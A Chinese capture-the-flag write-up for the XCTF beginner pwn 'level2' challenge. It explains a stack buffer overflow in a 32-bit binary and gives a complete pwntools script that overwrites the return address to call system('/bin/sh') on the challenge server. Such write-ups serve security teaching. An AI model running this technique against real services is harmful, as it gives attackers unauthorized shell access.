攻防世界 pwn新手 level2

这里我们先下载附件，查看一下文件信息：

32位的i386程序，没有开canary，推测可以使用栈溢出，这里我们用IDA32打开,查看main函数的伪代码

顺藤摸瓜找到输入点buf：

这里我们查看buf的栈结构，他只用了0x88字节但是给了100字节的输入空间，明显的栈溢出

最后两位的返回值s是一个4字节的数组，r为程序返回的地址，就是我们要操作的东西

初步的payload可以定为  'a'*0x88+'aaaa'+.....

我们再往下看，做pwn一般就是找到system函数然后运行自己的命令，所以我们找到了_system函数，地址为：

system=0x08048320.这是第一步，其次我们找找到我们可以调用的参数，如下：

bin_sh=0x0804A024

但还有一点要注意的是：

所以我们在插入参数前要首先覆盖掉函数返回地址这一部分。

这里我们的payload就构造完成了：

payload='a'*0x88+'aaaa'+p32(system)+p32(0)+p32(bin_sh)

整体代码为：

from pwn import *

p = remote('220.249.52.133',30056)

system=0x08048320

bin_sh=0x0804A024

p.sendline('a'*0x88+'aaaa'+ p32(system)+p32(0)+p32(bin_sh))

p.interactive()

运行结果如下：